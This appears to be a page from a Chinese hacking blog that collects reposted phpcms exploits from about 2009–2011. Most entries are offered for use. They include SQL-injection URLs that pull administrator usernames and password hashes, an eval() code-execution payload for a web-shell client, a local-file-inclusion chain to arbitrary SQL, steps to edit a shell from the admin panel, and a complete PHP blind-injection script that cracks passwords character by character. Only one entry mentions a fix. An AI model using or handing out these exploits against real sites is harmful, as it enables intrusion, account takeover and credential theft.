久久久电脑学习|渗透|注射|备忘|资料|收集|网文|入侵|注入|工作室|久久久电脑工作室|久久久|st999|电脑|电脑工作室|久久久电脑|

浏览模式: 标准 | 列表Tag:phpcms

phpcms V9 BLind SQL Injection Vulnerability

Submitted by admin

2011, January 23, 11:23 AM

=================================================================
phpcms V9 BLind SQL Injection Vulnerability
=================================================================

Software: phpcms V9
Vendor:    www.phpcms.cn
Vuln Type:  BLind SQL Injection
Download link:  http://www.phpcms.cn/2010/1229/326.html
Author:    eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home:    www.eidelweiss.info

Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^

References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10  <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

=================================================================

Nothing Impossible In This World Even Nobody`s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:14857

Phpcms 2008 flash_upload.php文件注入漏洞

Submitted by admin

2011, January 21, 12:37 PM

针对版本：Phpcms 2008 V2

一个小日本今天公布的

注入地址

http://server/phpcms_th/flash_upload.php?modelid=1

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:15816

Phpcms 2008 query.php SQL注入漏洞

Submitted by admin

2010, October 31, 9:02 PM

EXP：

ask/query.php?action=edit_answer&dosubmit=1&pid=2&posts[%6D%65%73%73%61%67%65%60%3D%28%73%65%6C%65%63%74%20%70%61%73%73%77%6F%72%64%20%66%72%6F%6D%20%70%68%70%63%6D%73%5F%6D%65%6D%62%65%72%20%77%68%65%72%65%20%67%72%6F%75%70%69%64%3D%31%29%20%77%68%65%72%65%20%61%73%6B%69%64%3D%32%23]

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:9089

Phpcms 2008 space.api.php SQL注入漏洞

Submitted by admin

2010, October 31, 9:02 PM

EXP：

api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%23

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:7783

很老的一个PHPCMS2008 SP2 0day

Submitted by admin

2010, September 11, 2:36 PM

http://URL/tags.php?id={${${eval($_POST[x])}}}

直接拿一句话连接以上地址.

这漏洞是在分析某网站日志的时候看到有人POST数据的,但是找了好几个版本,都不知道成因是什么.

哪位大大知道的话告诉我一声啊.

来源

http://hi.baidu.com/luc1f3r%5F/blog/item/50a903673df15b6e0d33faed.html

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:9871

Phpcms2008本地文件包含漏洞及利用：任意SQL语句执行

Submitted by admin

2010, September 7, 10:08 PM

最近一直做马后炮了，于是被人鄙视；但没办法，做出头鸟也被人嘲笑！反正这些玩意丢我这里也没啥用，只会烂在硬盘里！于是，只要有点风吹草动，我就公布吧。乌云的文章在此：http://www.wooyun.org/bug.php?action=view&id=497，文章暂时还没有公布详情...于是...我说一下。

Phpcms2008之前已经暴过很多问题了，但这个本地包含一直无人提起，小明曾经在t00ls里核心版块说过，但其实这个本地包含即使不通过旁注也是有办法利用的，那就是增加管理员或者修改管理员密码！

好了，先说本地包含，有几处，我不知道乌云上说的是哪一处，于是我就当其说的是最明显的那处吧。很明显的漏洞，不知道为啥还在phpcms中出现，先看代码：

文件在wap/index.php

<?php include '../include/common.inc.php'; include './include/global.func.php'; $lang = include './include/lang.inc.php'; if(preg_match('/(mozilla|m3gate|winwap|openwave)/i', $_SERVER['HTTP_USER_AGENT'])) { header('location:../');//判断，调试时先注释掉，from http://www.oldjun.com } wmlHeader($PHPCMS['sitename']);//判断，调试时先注释掉，from http://www.oldjun.com $action = isset($action) && !empty($action) ? $action : 'index';//直接把action带进来了，from http://www.oldjun.com if($action) { include './include/'.$action.'.inc.php';//本地包含，from http://www.oldjun.com } $html = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $html) : $html; echo str_replace(' ', " \n", $html); wmlFooter(); ?>

去掉几处判断条件就可以调试了，action没有进行限制与过滤，然后悲剧的全局：

if($_REQUEST) { if(MAGIC_QUOTES_GPC) { $_REQUEST = new_stripslashes($_REQUEST); if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE); extract($db->escape($_REQUEST), EXTR_SKIP); } else { $_POST = $db->escape($_POST); $_GET = $db->escape($_GET); $_COOKIE = $db->escape($_COOKIE); @extract($_POST,EXTR_SKIP); @extract($_GET,EXTR_SKIP); @extract($_COOKIE,EXTR_SKIP); } if(!defined('IN_ADMIN')) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS); if($_COOKIE) $db->escape($_COOKIE); }

于是可以成功本地包含，剩下来的就是这个本地包含怎么利用的问题了。包含的文件限制为*.inc.php，phpcms的开发者非常喜欢用这个命名规则，于是好多好多文件都是说明什么.inc.php，随便包含一个有利用价值的即可，随便找找：

formguide/admin/include/fields/datetime/field_add.inc.php

<?php if($dateformat == 'date') { $sql = "ALTER TABLE `$tablename` ADD `$field` DATE NOT NULL DEFAULT '0000-00-00'"; } elseif($dateformat == 'datetime') { $sql = "ALTER TABLE `$tablename` ADD `$field` DATETIME NOT NULL DEFAULT '0000-00-00 00:00:00'"; } elseif($dateformat == 'int') { if($format) $sql = "ALTER TABLE `$tablename` ADD `$field` INT UNSIGNED NOT NULL DEFAULT '0'"; } $db->query($sql);//$sql等于没有初始化，from http://www.oldjun.com ?>

$dateformat不初始化，$sql就没有初始化，于是直接可以执行了：

POC：
http://127.0.0.1/phpcms/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=select 1

原文：http://www.oldjun.com/blog/index.php/archives/73/

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:10725

phpcms 0day一枚

Submitted by admin

2010, August 10, 9:36 PM

刚看酒吧有人问！就转来了。。
1、找到任意一篇文章发表评论并得到评论ID。

提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID

3、重新查看评论

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:13787

phpcms2008 sp3通杀0day

Submitted by admin

2010, May 25, 3:04 PM

此漏洞半年前已由dindle发布在海洋顶端，所以转载请著名来源
注入
yp/company.php where=%23
进入后台访问

http://www.xx.com/admin.php mod=phpcms&file=safe&action=see_code&files=kindle.php

编辑shell，另外phpcms2008有多出包含漏洞，尚未得到合适利用暂时先不发布了

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:8378

phpcms2008sp4 最新sql注入

Submitted by admin

2010, May 25, 2:57 PM

漏洞名称：

phpcms2008sq4 最新sql注入

发布日期：

2010-05-24

受影响系统：

phpcms2008sp4_UTF8_100510

安全综述：

Phpcms 是国内领先的网站内容管理系统，同时也是一个开源的PHP开发框架。Phpcms由内容模型、会员、问吧、专题、财务、订单、广告、邮件订阅、短消息、自定义表单、全站搜索等20多个功能模块组成，内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 采用模块化开发，支持自定义内容模型和会员模型，并且可以自定义字段。

漏洞描述：

ads\include\ads.class.php

function edit($ads, $adsid, $username = '') //110行

{

if(!$this->check_form($ads)) return FALSE;

$ads = $this->check_form($ads);

if(defined('IN_ADMIN'))

{

$ads['fromdate'] = strtotime($ads['fromdate']);

$ads['todate'] = strtotime($ads['todate']);

}

$this->adsid = $adsid;

$where = ' adsid='.$this->adsid;

if($username) $where .= " AND username='$username'";

return $this->db->update($this->table, $ads, $where);

}

Ads\member.php

if(!$c_ads->edit($info, $adsid, $_username)) showmessage($c_ads->msg(), 'goback'); //47行

变量$adsid没有经过处理就直接进入SQL查询，造成SQL注入。

测试方法：

注册普通会员账号

预订一个广告，然后修改

大小: 13.42 K 尺寸: 500 x 242 浏览: 58 次点击打开新窗口浏览全图

修改 adsid的值，这里是注入的地点。提交出错信息如下：

大小: 8.82 K 尺寸: 500 x 131 浏览: 53 次点击打开新窗口浏览全图

解决方案：

等官方补丁或修改
ads\include\ads.class.php

$this->adsid = intval($adsid);

来自:Jannock

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:9649

phpcms2008sp4 IIS下下载任意文件漏洞

Submitted by admin

2010, May 25, 8:02 AM

受影响系统：phpcms2008sp4_UTF8_100510

测试方法：
注册会员
发布一篇下载的文章（不需要通过审核）
然后预览，再点下载即可。

Tags: phpcms

漏洞集研 | 评论:0 | Trackbacks:0 | 阅读:10966

phpcms2008 sp3通杀0day

Submitted by admin

2010, May 2, 9:15 AM

注入yp/company.php?where=%23

进入后台访问
http://www.heimian.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

编辑shell，另外phpcms2008有多出包含漏洞，尚未得到合适利用暂时先不发布了

Ps:t00ls那个陆jj装比最没水准，把后台拿shell的漏洞说成uc通杀的0day，BS下

对了，t00ls的会员以上的id密码没改好的赶快了，你们前阵子被日了，估计都不知道吧

Tags: phpcms

oday收藏 | 评论:0 | Trackbacks:0 | 阅读:10804

phpcms2008 最新0day & Exp(转)

Submitted by admin

2009, December 19, 3:36 PM

漏洞存在于yp/job.php的17-34行，urldecode函数惹的祸，代码如下：

==========================================================
switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;

=================================================================

exp：

<?

if ($argc != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." <hostname> <path> <userid>".
"\n[+] Ex. : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

$query = "x%2527";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

if ($match[1]) {

echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}

else {
die(" Exploit failed...");
}

echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}

if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}

$length=$i-1;
echo "[+]length -> ".$length;

// return $length;
//}

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos <= $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos <= 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";

?>

Tags: phpcms

漏洞集研 | 评论:0 | Trackbacks:0 | 阅读:11353

Records:1512 ›

久久久电脑

phpcms V9 BLind SQL Injection Vulnerability

Phpcms 2008 flash_upload.php文件注入漏洞

Phpcms 2008 query.php SQL注入漏洞

Phpcms 2008 space.api.php SQL注入漏洞

很老的一个PHPCMS2008 SP2 0day

Phpcms2008本地文件包含漏洞及利用：任意SQL语句执行

phpcms 0day一枚

phpcms2008 sp3通杀0day

phpcms2008sp4 最新sql注入

phpcms2008sp4 IIS下下载任意文件漏洞

phpcms2008 sp3通杀0day

phpcms2008 最新0day & Exp(转)

日志分类

热门标签

搜索文章

最新评论

博客信息

51.la

{title}